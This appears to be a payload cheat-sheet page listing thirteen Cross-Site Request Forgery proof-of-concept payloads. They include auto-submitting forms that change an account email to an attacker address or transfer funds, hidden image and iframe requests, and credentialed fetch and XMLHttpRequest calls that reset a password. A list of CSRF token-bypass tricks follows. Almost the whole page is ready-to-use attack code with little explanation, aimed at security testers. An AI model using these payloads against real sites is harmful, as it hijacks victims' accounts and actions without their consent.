$loading...
Cross-Site Request Forgery proof-of-concept payloads for auto-submitting forms, XHR, fetch, and JSON CSRF. (13 payloads)
<form action="https://TARGET/change-email" method="POST"><input type="hidden" name="email" value="attacker@evil.com"/></form><script>document.forms[0].submit();</script><form action="https://TARGET/transfer" method="POST" enctype="text/plain"><input name='{"amount":1000,"to":"attacker","ignore":"'value='"}'/></form><script>document.forms[0].submit();</script><img src="https://TARGET/delete?id=1" style="display:none"><iframe src="https://TARGET/action?param=value" style="display:none"></iframe><script>fetch("https://TARGET/api/change-password",{method:"POST",credentials:"include",headers:{"Content-Type":"application/x-www-form-urlencoded"},body:"password=hacked"})</script><script>var x=new XMLHttpRequest();x.open("POST","https://TARGET/api/action");x.withCredentials=true;x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");x.send("param=value");</script><script>fetch("https://TARGET/api/action",{method:"POST",credentials:"include",headers:{"Content-Type":"application/json"},body:JSON.stringify({key:"value"})})</script>Remove CSRF token parameter entirelyUse empty string as CSRF token valueSwap CSRF token from another sessionChange POST to GET and move params to query stringChange Content-Type to text/plain or multipart/form-dataUse same CSRF token value twiceLevel up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides